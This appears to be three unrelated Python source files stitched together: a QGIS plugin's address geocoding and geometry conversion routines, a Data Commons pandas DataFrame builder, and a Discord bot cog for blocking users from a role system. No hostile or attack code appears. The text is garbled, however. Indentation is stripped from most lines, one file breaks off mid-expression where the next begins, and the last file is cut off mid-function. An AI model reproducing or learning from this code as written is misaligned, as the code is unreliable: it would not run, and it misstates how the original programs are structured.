# Find percentage distance along street
left = ((leftfrom_number % 2) == (number % 2))
if left:
if (leftfrom_number == leftto_number):
ratio = 0.5
else:
ratio = float(number - leftfrom_number) \
/ float(leftto_number - leftfrom_number)
else:
if (rightfrom_number == rightto_number):
ratio = 0.5
else:
ratio = float(number - rightfrom_number) \
/ float(rightto_number - rightfrom_number)
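				# Worked example: house number 25 on the left side of a segment
				# addressed 21-29 gives ratio = (25 - 21) / (29 - 21) = 0.5, so the
				# point is placed halfway along the (setback-adjusted) segment.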
# setback from corner
angle = atan2(toy - fromy, tox - fromx)
setback_fromx = fromx + (setback * cos(angle))
setback_tox = tox - (setback * cos(angle))
setback_fromy = fromy + (setback * sin(angle))
setback_toy = toy - (setback * sin(angle))
x = setback_fromx + ((setback_tox - setback_fromx) * ratio)
y = setback_fromy + ((setback_toy - setback_fromy) * ratio)
# setback from street center
if left:
y += (setback * cos(angle))
x -= (setback * sin(angle))
else:
y -= (setback * cos(angle))
x += (setback * sin(angle))
# Create the output feature
newattributes = []
for field in row:
# newattributes.append(QVariant(field))
newattributes.append(field)
#newattributes.append(QVariant(x))
#newattributes.append(QVariant(y))
newattributes.append(x)
newattributes.append(y)
newfeature = QgsFeature()
newfeature.setAttributes(newattributes)
geometry = QgsGeometry.fromPoint(QgsPoint(x, y))
newfeature.setGeometry(geometry)
outfile.addFeature(newfeature)
matched_count += 1
# Remove address so not searched further
del addresses[row_index]
else:
row_index = row_index + 1
#print "del outfile 1"
del outfile
# Write unjoined addresses to notfound file
for index, row in enumerate(addresses):
if row[streetnamefield_index] > "":
notfoundwriter.writerow([unicode(field).encode("utf-8") for field in row])
# Close notfound file
del notfound
if matched_count and addlayer:
#print "addLayer"
vlayer = qgis.addVectorLayer(shapefilename, os.path.basename(shapefilename), "ogr")
mmqgis_completion_message(qgis, unicode(matched_count) + " of " + unicode(len(addresses)) \
+ " addresses geocoded from " + unicode(feature_count) + " street records")
return None
# --------------------------------------------------------
# mmqgis_geometry_convert - Convert geometries to
# simpler types
# --------------------------------------------------------
def mmqgis_geometry_convert(qgis, layername, newgeometry, savename, addlayer):
layer = mmqgis_find_layer(layername)
	if (layer == None) or (layer.type() != QgsMapLayer.VectorLayer):
return "Vector layer required: " + layername
# Create output file
if len(savename) <= 0:
return "Invalid output filename given"
if QFile(savename).exists():
if not QgsVectorFileWriter.deleteShapeFile(savename):
return "Failure deleting existing shapefile: " + savename
if (newgeometry == "Points") or (newgeometry == "Centroids") or \
(newgeometry == "Nodes") or (newgeometry == "Line Centers"):
savetype = QGis.WKBPoint
elif (newgeometry == "Lines"):
savetype = QGis.WKBLineString
elif (newgeometry == "Polygons"):
savetype = QGis.WKBPolygon
elif (newgeometry == "Multipoints"):
savetype = QGis.WKBMultiPoint
elif (newgeometry == "Multilines"):
savetype = QGis.WKBMultiLineString
elif (newgeometry == "Multipolygons"):
savetype = QGis.WKBMultiPolygon
else:
return "Invalid type for new geometry: " + unicode(newgeometry)
outfile = QgsVectorFileWriter(savename, "utf-8", layer.fields(), savetype, layer.crs())
if (outfile.hasError() != QgsVectorFileWriter.NoError):
return "Failure creating output shapefile: " + unicode(outfile.errorMessage())
# Iterate through each feature in the source layer
feature_count = layer.featureCount()
out_count = 0
for feature_index, feature in enumerate(layer.getFeatures()):
# shapeid = unicode(feature.id()).strip()
if (feature_index % 10) == 0:
mmqgis_status_message(qgis, "Converting feature " + str(feature_index) \
+ " of " + unicode(feature_count))
if (feature.geometry().wkbType() == QGis.WKBPoint) or \
(feature.geometry().wkbType() == QGis.WKBPoint25D):
if (newgeometry == "Points"):
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromPoint(feature.geometry().asPoint()))
outfile.addFeature(newfeature)
out_count = out_count + 1
else:
return "Invalid Conversion: " + mmqgis_wkbtype_to_text(feature.geometry().wkbType()) + \
" to " + unicode(newgeometry)
elif (feature.geometry().wkbType() == QGis.WKBLineString) or \
(feature.geometry().wkbType() == QGis.WKBLineString25D):
if (newgeometry == "Nodes"):
polyline = feature.geometry().asPolyline()
for point in polyline:
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromPoint(point))
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Centroids"):
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(feature.geometry().centroid())
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Line Centers"):
point = mmqgis_line_center(feature.geometry(), 50.0)
if (not point):
continue
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(point)
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Lines"):
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(feature.geometry())
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Multilines"):
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromMultiPolyline([feature.geometry().asPolyline()]))
outfile.addFeature(newfeature)
out_count = out_count + 1
else:
return "Invalid Conversion: " + mmqgis_wkbtype_to_text(feature.geometry().wkbType()) + \
" to " + newgeometry
elif (feature.geometry().wkbType() == QGis.WKBPolygon) or \
(feature.geometry().wkbType() == QGis.WKBPolygon25D):
if (newgeometry == "Nodes"):
polygon = feature.geometry().asPolygon()
for polyline in polygon:
for point in polyline:
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromPoint(point))
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Centroids"):
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(feature.geometry().centroid())
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Lines"):
polygon = feature.geometry().asPolygon()
for polyline in polygon:
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromPolyline(polyline))
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Multilines"):
linestrings = []
polygon = feature.geometry().asPolygon()
for polyline in polygon:
linestrings.append(polyline)
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromMultiPolyline(linestrings))
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Polygons"):
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(feature.geometry())
outfile.addFeature(newfeature)
out_count = out_count + 1
else:
return "Invalid Conversion: " + mmqgis_wkbtype_to_text(feature.geometry().wkbType()) + \
" to " + newgeometry
elif (feature.geometry().wkbType() == QGis.WKBMultiPoint) or \
(feature.geometry().wkbType() == QGis.WKBMultiPoint25D):
if (newgeometry == "Points"):
points = feature.geometry().asMultiPoint()
for point in points:
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromPoint(point))
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Centroids"):
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(feature.geometry().centroid())
outfile.addFeature(newfeature)
out_count = out_count + 1
else:
return "Invalid Conversion: " + mmqgis_wkbtype_to_text(feature.geometry().wkbType()) + \
" to " + newgeometry
elif (feature.geometry().wkbType() == QGis.WKBMultiLineString) or \
(feature.geometry().wkbType() == QGis.WKBMultiLineString25D):
if (newgeometry == "Nodes"):
polylines = feature.geometry().asMultiPolyline()
for polyline in polylines:
for point in polyline:
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromPoint(point))
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Centroids"):
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(feature.geometry().centroid())
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Lines"):
linestrings = feature.geometry().asMultiPolyline()
for linestring in linestrings:
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromPolyline(linestring))
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Line Centers"):
linestrings = feature.geometry().asMultiPolyline()
for linestring in linestrings:
line_center = mmqgis_line_center(QgsGeometry.fromPolyline(linestring), 50.0)
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(line_center)
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Multilines"):
linestrings = feature.geometry().asMultiPolyline()
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromMultiPolyline(linestrings))
outfile.addFeature(newfeature)
out_count = out_count + 1
else:
return "Invalid Conversion: " + mmqgis_wkbtype_to_text(feature.geometry().wkbType()) + \
" to " + newgeometry
elif (feature.geometry().wkbType() == QGis.WKBMultiPolygon) or \
(feature.geometry().wkbType() == QGis.WKBMultiPolygon25D):
if (newgeometry == "Nodes"):
polygons = feature.geometry().asMultiPolygon()
for polygon in polygons:
for polyline in polygon:
for point in polyline:
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromPoint(point))
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Centroids"):
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(feature.geometry().centroid())
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Lines"):
polygons = feature.geometry().asMultiPolygon()
for polygon in polygons:
for polyline in polygon:
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromPolyline(polyline))
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Polygons"):
polygons = feature.geometry().asMultiPolygon()
for polygon in polygons:
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromPolygon(polygon))
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Multilines") or (newgeometry == "Multipolygons"):
polygons = feature.geometry().asMultiPolygon()
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromMultiPolygon(polygons))
outfile.addFeature(newfeature)
out_count = out_count + 1
else:
return "Invalid Conversion: " + mmqgis_wkbtype_to_text(feature.geometry().wkbType()) + \
" to " + newgeometry
del outfile
if addlayer:
qgis.addVectorLayer(savename, os.path.basename(savename), "ogr")
mmqgis_completion_message(qgis, unicode(feature_count) + " features converted to " + unicode(out_count) + " features")
return None
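# Example call (hypothetical layer and file names), converting a polygon layer to centroid points:
#   mmqgis_geometry_convert(qgis, "parcels", "Centroids", "/tmp/parcel_centroids.shp", True)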
# --------------------------------------------------------
# mmqgis_geometry_to_multipart - Convert singlepart
# to multipart geometries
# --------------------------------------------------------
def mmqgis_geometry_to_multipart(qgis, layername, mergefield, mergeattop, savename, addlayer):
# Error checking
layer = mmqgis_find_layer(layername)
	if (layer == None) or (layer.type() != QgsMapLayer.VectorLayer):
return "Invalid Vector Layer " + layername
if (layer.wkbType() in [QGis.WKBPoint, QGis.WKBPoint25D]):
newtype = QGis.WKBMultiPoint
elif (layer.wkbType() in [QGis.WKBLineString, QGis.WKBLineString25D]):
newtype = QGis.WKBMultiLineString
elif (layer.wkbType() in [QGis.WKBPolygon, QGis.WKBPolygon25D]):
newtype = QGis.WKBMultiPolygon
else:
return "Geometry is already multipart: " + mmqgis_wkbtype_to_text(layer.wkbType())
merge_index = layer.fieldNameIndex(mergefield)
if merge_index < 0:
return "Invalid merge field: " + mergefield
# Create output file
if len(savename) <= 0:
return "Invalid output filename given"
if QFile(savename).exists():
if not QgsVectorFileWriter.deleteShapeFile(savename):
return "Failure deleting existing shapefile: " + savename
outfile = QgsVectorFileWriter(savename, "utf-8", layer.fields(), newtype, layer.crs())
if (outfile.hasError() != QgsVectorFileWriter.NoError):
return "Failure creating output shapefile: " + unicode(outfile.errorMessage())
# Have to read features into memory because nested loops of getFeature() don't work
feature_count = layer.featureCount()
features = []
for index, feature in enumerate(layer.getFeatures()):
if (index % 10) == 0:
mmqgis_status_message(qgis, "Reading feature " + unicode(index) \
+ " of " + unicode(feature_count))
features.append(feature)
# Iterate through each feature in the source layer
merge_count = 0
for x in range(0, len(features)):
if (x % 10) == 0:
mmqgis_status_message(qgis, "Converting feature " + str(x) \
+ " of " + unicode(len(features)))
if features[x] != None:
attributes = features[x].attributes()
# key = unicode(attributes[merge_index].toString()).lower()
key = unicode(attributes[merge_index]).lower()
# print "Processing " + unicode(x) + ": " + key
newgeometry = []
if newtype == QGis.WKBMultiPoint:
				if (features[x].geometry().wkbType() == QGis.WKBPoint) or \
					(features[x].geometry().wkbType() == QGis.WKBPoint25D):
					newgeometry.append(features[x].geometry().asPoint())
				elif (features[x].geometry().wkbType() == QGis.WKBMultiPoint) or \
					(features[x].geometry().wkbType() == QGis.WKBMultiPoint25D):
for point in features[x].geometry().asMultiPoint():
newgeometry.append(point)
else:
return "Invalid multipoint geometry type: " + \
mmqgis_wkbtype_to_text(features[x].geometry().wkbType())
elif newtype == QGis.WKBMultiLineString:
# This is a workaround since shapefiles do not distinguish
				# between polylines and multipolylines - all polylines can have multiple
# parts. QgsGeometry.wkbType() returns WKBLineString even if the
# geometry is WKBMultiLineString
#if (feature.geometry().wkbType() == QGis.WKBLineString) or \
# (feature.geometry().wkbType() == QGis.WKBLineString25D):
if len(features[x].geometry().asPolyline()) > 0:
newgeometry.append(features[x].geometry().asPolyline())
#elif (feature.geometry().wkbType() == QGis.WKBMultiLineString) or \
# (feature.geometry().wkbType() == QGis.WKBMultiLineString25D):
elif len(features[x].geometry().asMultiPolyline()) > 0:
for polyline in features[x].geometry().asMultiPolyline():
newgeometry.append(polyline)
else:
return "Invalid multilinestring geometry type: " + \
mmqgis_wkbtype_to_text(features[x].geometry().wkbType())
else: # newtype == QGis.WKBMultiPolygon:
# This is a workaround since shapefiles do not distinguish
# between polygons and multipolygons - all polygons can have multiple
# parts. QgsGeometry.wkbType() returns WKBPolygon even if the
# geometry is WKBMultiPolygon
#if (feature.geometry().wkbType() == QGis.WKBPolygon) or \
# (feature.geometry().wkbType() == QGis.WKBPolygon25D):
if len(features[x].geometry().asPolygon()) > 0:
newgeometry.append(features[x].geometry().asPolygon())
#elif (feature.geometry().wkbType() == QGis.WKBMultiPolygon) or \
# (feature.geometry().wkbType() == QGis.WKBMultiPolygon25D):
elif len(features[x].geometry().asMultiPolygon()) > 0:
for polygon in features[x].geometry().asMultiPolygon():
newgeometry.append(polygon)
else:
return "Invalid multipolygon geometry type: " + \
mmqgis_wkbtype_to_text(features[x].geometry().wkbType())
for y in range(x + 1, len(features)):
#print " Comparing " + unicode(y)
#if (features[y] != None) and \
# (unicode(features[y].attributes()[merge_index].toString()).lower() == key):
if (features[y] != None) and \
(unicode(features[y].attributes()[merge_index]).lower() == key):
# print " " + unicode(features[y].geometry().wkbType())
if newtype == QGis.WKBMultiPoint:
newgeometry.append(features[y].geometry().asPoint())
elif newtype == QGis.WKBMultiLineString:
newgeometry.append(features[y].geometry().asPolyline())
# MultiPolygons must be broken apart into separate polygons
elif features[y].geometry().wkbType() == QGis.WKBMultiPolygon:
for polygon in features[y].geometry().asMultiPolygon():
newgeometry.append(polygon)
else: # QGis.WKBMultiPolygon:
newgeometry.append(features[y].geometry().asPolygon())
if mergeattop == "Sum":
for zindex, zfield in enumerate(layer.fields()):
zvalue = features[y].attributes()[zindex]
							if (zfield.type() ==
<filename>datacommons_pandas/df_builder.py
# Copyright 2020 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Data Commons Pandas API DataFrame Builder Module.
Provides functions for building pandas DataFrames using the Data Commons Graph.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import pandas as pd
import six
import datacommons_pandas.stat_vars as dc
def build_time_series(place,
stat_var,
measurement_method=None,
observation_period=None,
unit=None,
scaling_factor=None):
"""Constructs a pandas Series with `dates` as the index and corresponding `stat_var` statistics as values.
Args:
place (`str`): The dcid of Place to query for.
stat_var (`str`): The dcid of the StatisticalVariable.
measurement_method (`str`): Optional, the dcid of the preferred
`measurementMethod` value.
observation_period (`str`): Optional, the preferred
`observationPeriod` value.
unit (`str`): Optional, the dcid of the preferred `unit` value.
scaling_factor (`int`): Optional, the preferred `scalingFactor` value.
Returns:
        A pandas Series with dates as the index and observed statistics as
values, representing a time series satisfying all optional args.
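    Examples:
      An illustrative call, using the same hypothetical data as the
      `_time_series_pd_input` example further below:
      >>> build_time_series('geoId/29', 'Count_Person')
      2020-03-07    20
      2020-03-08    40
      dtype: int64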
"""
return pd.Series(
dc.get_stat_series(place, stat_var, measurement_method,
observation_period, unit, scaling_factor))
def _group_stat_all_by_obs_options(places, stat_vars, keep_series=True):
"""Groups the result of `get_stat_all` by StatVarObservation options for time series or multivariates.
Note that this function does not preserve `(place, stat_var)` pairs that
    yield no data from `get_stat_all`. In the extreme case that there is no
data for any pairs, raise a ValueError instead of returning an empty dict.
Args:
places (`str` or `iterable` of `str`): The dcids of Places to query for.
stat_vars (`Iterable` of `str`): The dcids of the StatisticalVariables.
keep_series (`boolean`): if True, output time series grouped by
StatVarObservation options; if False, output latest statistics grouped
by StatVarObservation options.
Returns:
A nested dict mapping each StatisticalVariable in `stat_vars` to its
StatVarObservation options. In turn, each StatVarObservation option
maps to a list of rows, one per place, with the place id and stat data.
Raises:
ValueError: If the payload returned by the Data Commons REST API is
malformed, or if there is no data for any (Place, StatisticalVariables)
pair.
"""
if keep_series:
if len(stat_vars) != 1:
raise ValueError(
'When `keep_series` is set, only one StatisticalVariable for `stat_vars` is allowed.'
)
res = collections.defaultdict(list)
else:
res = collections.defaultdict(lambda: collections.defaultdict(list))
stat_all = dc.get_stat_all(places, stat_vars)
for place, place_data in stat_all.items():
if not place_data:
continue
for stat_var, stat_var_data in place_data.items():
if not stat_var_data:
continue
for source_series in stat_var_data['sourceSeries']:
series = source_series['val']
# Convert dict of SVO options into nested tuple (hashable key).
obs_options = (('measurementMethod',
source_series.get('measurementMethod')),
('observationPeriod',
source_series.get('observationPeriod')),
('unit', source_series.get('unit')),
('scalingFactor',
source_series.get('scalingFactor')))
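                # Illustrative key:
                # (('measurementMethod', None), ('observationPeriod', 'P1Y'),
                #  ('unit', None), ('scalingFactor', None))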
if keep_series:
res[obs_options].append(dict({'place': place}, **series))
else:
date = max(series)
res[stat_var][obs_options].append({
'place': place,
'date': date,
'val': series[date]
})
if not res:
raise ValueError(
'No data for any of specified Places and StatisticalVariables.')
if keep_series:
return dict(res)
else:
return {k: dict(v) for k, v in res.items()}
def _time_series_pd_input(places, stat_var):
"""Returns a `list` of `dict` per element of `places` based on the `stat_var`.
Data Commons will pick a set of StatVarObservation options that covers the
maximum number of queried places. Among ties, Data Commons selects an option
set with the latest Observation.
Args:
places (`str` or `iterable` of `str`): The dcids of Places to query for.
stat_var (`str`): The dcid of the StatisticalVariable.
Returns:
A `list` of `dict`, one per element of `places`. Each `dict` consists of
the time series and place identifier.
Examples:
>>> _time_series_pd_input(["geoId/29", "geoId/33"], "Count_Person")
[
{'2020-03-07': 20, '2020-03-08': 40, 'place': 'geoId/29'},
{'2020-08-21': 428, '2020-08-22': 429, 'place': 'geoId/33'}
]
"""
rows_dict = _group_stat_all_by_obs_options(places, [stat_var],
keep_series=True)
most_geos = []
max_geo_count_so_far = 0
latest_date = []
latest_date_so_far = ''
for options, rows in rows_dict.items():
current_geos = len(rows)
if current_geos > max_geo_count_so_far:
max_geo_count_so_far = current_geos
most_geos = [options]
# Reset tiebreaker stats. Recompute after this if-else block.
latest_date = []
latest_date_so_far = ''
elif current_geos == max_geo_count_so_far:
most_geos.append(options)
else:
# Do not compute tiebreaker stats if no change to most_geos.
# Skip to top of the for loop.
continue
for row in rows:
dates = set(row.keys())
dates.remove('place')
row_max_date = max(dates)
if row_max_date > latest_date_so_far:
latest_date_so_far = row_max_date
latest_date = [options]
elif row_max_date == latest_date_so_far:
latest_date.append(options)
for options in most_geos:
if options in latest_date:
return rows_dict[options]
def build_time_series_dataframe(places, stat_var, desc_col=False):
"""Constructs a pandas DataFrame with `places` as the index and dates of the time series as the columns.
To ensure statistics are comparable across all Places, when multiple
StatVarObservations options are available for Place and StatVar combos,
Data Commons selects the StatVarObservation options that covers the most
Places, and breaks ties using the StatVarObservation options that yield
the latest Observation for any Place.
Args:
places (`str` or `iterable` of `str`): The dcids of Places to query for.
stat_var (`str`): The dcid of the StatisticalVariable.
desc_col: Whether to order columns in descending order.
Returns:
A pandas DataFrame with Place IDs as the index, and sorted dates as columns.
"""
try:
if isinstance(places, six.string_types):
places = [places]
else:
places = list(places)
assert all(isinstance(place, six.string_types) for place in places)
except:
raise ValueError(
'Parameter `places` must be a string object or list-like object of string.'
)
if not isinstance(stat_var, six.string_types):
raise ValueError('Parameter `stat_var` must be a string.')
df = pd.DataFrame.from_records(_time_series_pd_input(places, stat_var))
df.set_index('place', inplace=True)
df.sort_index(inplace=True)
return df[sorted(df.columns, reverse=desc_col)]
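# Illustrative usage (dcids as in the examples in this module):
#   df = build_time_series_dataframe(["geoId/29", "geoId/33"], "Count_Person")
#   df.loc["geoId/29"]  # time series of Count_Person for geoId/29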
def _multivariate_pd_input(places, stat_vars):
"""Returns a `list` of `dict` per element of `places` based on the `stat_var`.
Data Commons will pick a set of StatVarObservation options that covers the
maximum number of queried places. Among ties, Data Commons selects an option
set with the latest Observation.
Args:
places (`str` or `iterable` of `str`): The dcids of Places to query for.
stat_vars (`Iterable` of `str`): The dcids of the StatisticalVariables.
Returns:
A `list` of `dict`, one per element of `places`. Each `dict` consists of
the time series and place identifier.
Examples:
>>> _multivariate_pd_input(["geoId/29", "geoId/33"],
["Count_Person", "Median_Income_Person"])
[
{'Count_Person': 20, 'Median_Income_Person': 40, 'place': 'geoId/29'},
{'Count_Person': 428, 'Median_Income_Person': 429, 'place': 'geoId/33'}
]
"""
rows_dict = _group_stat_all_by_obs_options(places,
stat_vars,
keep_series=False)
place2cov = collections.defaultdict(dict) # {geo: {var1: 3, var2: 33}}
for stat_var, candidates_dict in rows_dict.items():
selected_rows = None
most_geos = []
max_geo_count_so_far = 0
latest_date = []
latest_date_so_far = ''
for options, rows in candidates_dict.items():
current_geos = len(rows)
if current_geos > max_geo_count_so_far:
max_geo_count_so_far = current_geos
most_geos = [options]
# Reset tiebreaker stats. Recompute after this if-else block.
latest_date = []
latest_date_so_far = ''
elif current_geos == max_geo_count_so_far:
most_geos.append(options)
else:
# Do not compute tiebreaker stats if not in most_geos.
continue
for row in rows:
row_date = row['date']
if row_date > latest_date_so_far:
latest_date_so_far = row_date
latest_date = [options]
elif row_date == latest_date_so_far:
latest_date.append(options)
for options in most_geos:
if options in latest_date:
selected_rows = candidates_dict[options]
for row in selected_rows:
place2cov[row['place']][stat_var] = row['val']
return [
dict({'place': place}, **multivariates)
for place, multivariates in place2cov.items()
]
def build_multivariate_dataframe(places, stat_vars):
"""Constructs a pandas DataFrame with `places` as the index and `stat_vars` as the columns.
To ensure statistics are comparable across all Places, when multiple
StatVarObservations options are available for Place and StatVar combos,
Data Commons selects the StatVarObservation options that covers the most
Places, and breaks ties using the StatVarObservation options that yield
the latest Observation for any Place.
Args:
places (`str` or `iterable` of `str`): The dcids of Places to query for.
stat_vars (`Iterable` of `str`): The dcids of the StatisticalVariables.
Returns:
A pandas DataFrame with Place IDs as the index and `stat_vars` as columns.
"""
try:
if isinstance(places, six.string_types):
places = [places]
else:
places = list(places)
assert all(isinstance(place, six.string_types) for place in places)
if isinstance(stat_vars, six.string_types):
stat_vars = [stat_vars]
else:
stat_vars = list(stat_vars)
assert all(
isinstance(stat_var, six.string_types)
for stat_var in stat_vars)
except:
raise ValueError(
'Parameter `places` and `stat_vars` must be string object or list-like object.'
)
    df = pd.DataFrame.from_records(_multivariate_pd_input(places, stat_vars))
    df.set_index('place', inplace=True)
    df.sort_index(inplace=True)
    return df
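# Illustrative usage (dcids as in the examples in this module):
#   df = build_multivariate_dataframe(["geoId/29", "geoId/33"],
#                                     ["Count_Person", "Median_Income_Person"])
#   df.loc["geoId/29", "Count_Person"]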
<gh_stars>0
import asyncio
import discord
import random
from discord.ext import commands
from Cogs import Settings
from Cogs import DisplayName
from Cogs import Nullify
def setup(bot):
# Add the bot and deps
settings = bot.get_cog("Settings")
bot.add_cog(UserRole(bot, settings))
class UserRole(commands.Cog):
def __init__(self, bot, settings):
self.bot = bot
self.settings = settings
self.loop_list = []
def _is_submodule(self, parent, child):
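        # True when `child` is `parent` itself or a dotted submodule of it,
        # e.g. _is_submodule("Cogs", "Cogs.UserRole") -> True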
return parent == child or child.startswith(parent + ".")
@commands.Cog.listener()
async def on_unloaded_extension(self, ext):
# Called to shut things down
if not self._is_submodule(ext.__name__, self.__module__):
return
for task in self.loop_list:
task.cancel()
@commands.Cog.listener()
async def on_loaded_extension(self, ext):
# See if we were loaded
if not self._is_submodule(ext.__name__, self.__module__):
return
# Add a loop to remove expired user blocks in the UserRoleBlock list
self.loop_list.append(self.bot.loop.create_task(self.block_check_list()))
async def block_check_list(self):
await self.bot.wait_until_ready()
while not self.bot.is_closed():
# Iterate through the ids in the UserRoleBlock list and
# remove any for members who aren't here
for guild in self.bot.guilds:
block_list = self.settings.getServerStat(guild, "UserRoleBlock")
rem_list = [ x for x in block_list if not guild.get_member(x) ]
if len(rem_list):
block_list = [ x for x in block_list if x not in rem_list ]
self.settings.setServerStat(guild, "UserRoleBlock", block_list)
# Check once per hour
await asyncio.sleep(3600)
@commands.command(pass_context=True)
async def urblock(self, ctx, *, member = None):
"""Blocks a user from using the UserRole system and removes applicable roles (bot-admin only)."""
isAdmin = ctx.author.permissions_in(ctx.channel).administrator
if not isAdmin:
checkAdmin = self.settings.getServerStat(ctx.guild, "AdminArray")
for role in ctx.author.roles:
for aRole in checkAdmin:
# Get the role that corresponds to the id
if str(aRole['ID']) == str(role.id):
isAdmin = True
break
# Only allow bot-admins to change server stats
if not isAdmin:
await ctx.send('You do not have sufficient privileges to access this command.')
return
# Get the target user
mem = DisplayName.memberForName(member, ctx.guild)
if not mem:
await ctx.send("I couldn't find `{}`.".format(member.replace("`", "\\`")))
return
# Check if we're trying to block a bot-admin
isAdmin = mem.permissions_in(ctx.channel).administrator
if not isAdmin:
checkAdmin = self.settings.getServerStat(ctx.guild, "AdminArray")
for role in mem.roles:
for aRole in checkAdmin:
# Get the role that corresponds to the id
if str(aRole['ID']) == str(role.id):
isAdmin = True
break
# Only allow bot-admins to change server stats
if isAdmin:
await ctx.send("You can't block other admins or bot-admins from the UserRole module.")
return
# At this point - we have someone to block - see if they're already blocked
block_list = self.settings.getServerStat(ctx.guild, "UserRoleBlock")
m = ""
if mem.id in block_list:
m += "`{}` is already blocked from the UserRole module.".format(DisplayName.name(mem).replace("`", "\\`"))
else:
block_list.append(mem.id)
self.settings.setServerStat(ctx.guild, "UserRoleBlock", block_list)
m += "`{}` now blocked from the UserRole module.".format(DisplayName.name(mem).replace("`", "\\`"))
# Remove any roles
# Get the array
try:
promoArray = self.settings.getServerStat(ctx.guild, "UserRoles")
except Exception:
promoArray = []
if promoArray == None:
promoArray = []
# Populate the roles that need to be removed
remRole = []
for arole in promoArray:
roleTest = DisplayName.roleForID(arole['ID'], ctx.guild)
if not roleTest:
# Not a real role - skip
continue
if roleTest in mem.roles:
# We have it
remRole.append(roleTest)
if len(remRole):
# Only remove if we have roles to remove
self.settings.role.rem_roles(mem, remRole)
m += "\n\n*{} {}* removed.".format(len(remRole), "role" if len(remRole) == 1 else "roles")
await ctx.send(m)
@commands.command(pass_context=True)
async def urunblock(self, ctx, *, member = None):
"""Unblocks a user from the UserRole system (bot-admin only)."""
isAdmin = ctx.author.permissions_in(ctx.channel).administrator
if not isAdmin:
checkAdmin = self.settings.getServerStat(ctx.guild, "AdminArray")
for role in ctx.author.roles:
for aRole in checkAdmin:
# Get the role that corresponds to the id
if str(aRole['ID']) == str(role.id):
isAdmin = True
break
# Only allow bot-admins to change server stats
if not isAdmin:
await ctx.send('You do not have sufficient privileges to access this command.')
return
# Get the target user
mem = DisplayName.memberForName(member, ctx.guild)
if not mem:
await ctx.send("I couldn't find `{}`.".format(member.replace("`", "\\`")))
return
# At this point - we have someone to unblock - see if they're blocked
block_list = self.settings.getServerStat(ctx.guild, "UserRoleBlock")
if not mem.id in block_list:
await ctx.send("`{}` is not blocked from the UserRole module.".format(DisplayName.name(mem).replace("`", "\\`")))
return
block_list.remove(mem.id)
self.settings.setServerStat(ctx.guild, "UserRoleBlock", block_list)
await ctx.send("`{}` has been unblocked from the UserRole module.".format(DisplayName.name(mem).replace("`", "\\`")))
@commands.command(pass_context=True)
async def isurblocked(self, ctx, *, member = None):
"""Outputs whether or not the passed user is blocked from the UserRole module."""
if member == None:
member = "{}".format(ctx.author.mention)
# Get the target user
mem = DisplayName.memberForName(member, ctx.guild)
if not mem:
await ctx.send("I couldn't find `{}`.".format(member.replace("`", "\\`")))
return
block_list = self.settings.getServerStat(ctx.guild, "UserRoleBlock")
name = "You are" if mem.id == ctx.author.id else "`"+DisplayName.name(mem).replace("`", "\\`") + "` is"
if mem.id in block_list:
